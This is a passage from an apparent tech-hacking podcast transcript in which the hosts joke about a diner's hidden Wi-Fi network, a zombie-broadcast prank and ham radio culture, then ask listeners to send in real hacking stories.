how to connect their smartphones so they can send, you know, Snapchat's.
It's a lot of work to set up a Paskey or like a, a,
passphrase for the thing. So just like leave it open, just hide it. If nobody knows it's there,
then how is anybody going to use it? So it's so much more convenient. You don't need to know the password.
You do need to know the SSID. So you're just asking them to save the less secure string of
jargon. Errors were made in this diner. I'm sensing. I'm going to assume
diner owner, not security. That's valid. That's valid. I get it.
I like the swing at it being like, I'm going to take it off.
No one's going to see this network here.
It will be extremely secure.
Secured.
Exactly.
I think the War of the World's Orson Well's fake broadcast is like a really,
that's a really good move.
Because no, honestly, probably everyone in that diner knew that there wasn't really a zombie outbreak.
But it has that veneer of a, could there be?
Could there be zombies?
For like a second, everyone wondered.
as they were eating their eggs.
Eating my grilled ham and cheese and tomato soup.
Sitting here wondering if this is the last good meal I'll ever have.
Cock the shotgun.
Pull the headband on tighter.
War paint under the eyes.
Like, let's do this.
I've been planning for years.
I got a van that's got spikes on it.
I'm going to rule the wasteland.
Well, you have fun with that.
I will not.
The wasteland will rule me.
But it's fun to imagine.
I like this.
I also want to know what to.
I feel like I've never been to a ham radio conference,
but I got to think that is a,
that is a chill, wholesome vibe.
I bet that is a,
and I mean that sincerely.
Like,
that sounds like a fun weekend.
I got to,
you got to wonder if there's like,
like every,
every little subset has egos, right?
Like, what is a ham radio ego?
Like, is there,
like,
I've been a member of a lot of little subsets.
Like,
I used to play competitive tabletop gaming.
and you go to the world championships
and, like, there were egos there.
Yeah, sure.
Even though it's like, you're the, like,
biggest dog of, like, the 14,000 people globally
that play this silly game.
And, like, there's just all these weird things.
So it's like, what is a ham radio ego?
Right.
That's the real thing that jumps into me is, like,
is there some, like, cock of the walk that, like,
is the ham radio guy?
Yeah, it's a good question.
I assume they're probably, I assume they're, like,
the nicer you are, the bigger ego.
Like, the more notorious you would be.
Like, I feel like that's,
the kind of like innocent, delightful subculture that like rewards being a good person.
Sure. They're so nice. I hate them for it. See, I was going to go in the like darker direction.
Like is there a dark corner of the ham radio community? Like are we like the pirates or whatever
broadcasting copywritten musical material over their ham radios. People jamming other people's
ham radios and beefs that go back years. I don't know. They're having.
There's got to be.
There's got to be.
People broadcast and like propaganda between, I don't know.
I just, I want to see the seedy underbelly of ham radio.
I think I'm just for my own sake, I'm going to believe that like the largest celebrity
and influencer in the ham radio community is like the nicest human.
I like that.
I prefer to believe that.
Yeah.
It's like Jack, it's like I see Jack at every conference.
He will literally stop doing whatever he's doing to like help you solve and figure out what
you need.
Who's the Jack?
of ham radio and they're probably an extremely chill human being exactly yeah
I like that a lot okay I think that's another one I think that's another one another hotline
hacked in the bucket brought you by push security uh... prosecutor dot com thank you for
sharing all of your calls thank you for setting them on over again if you want to share
your strange tale of technology true hack computer confession we've been getting lots of like
different types of calls and we we really like that going over to hotline hacked
dot com, submit text, submit a voice.
You can call an actual phone line.
It's pretty cool.
Get at us with it.
I will say, let's put a request out.
What kind of story do I want to hear?
I want a real hack.
I want a penetration.
I want somebody to have hacked a web server.
I know there's a million of you out there listening to this that have done that.
So like somebody call in, email in, send in a voice change thing, do whatever.
But send us in a real story about like a real hack.
Real hacks.
I like it.
Real hacks in the next one.
Don't have to disclose who the target was unless you want to.
Just send us something that's got like a good depth of technical complexity.
I like that's what I want to hear.
And I remember in the last one, someone, we were talking about receipts.
And you don't need all receipts.
If you threw a zombie video up on a Denny's sports display, I'll take your word for it.
but like, oh boy, did I love, love having those videos we could play the audio from in the calls.
So I'll pass that in.
Okay.
And with that, have a great week or two, depending on when our next episode comes out in relation to this.
And have a great month.
And we'll see you guys soon.
Catch you in the next one.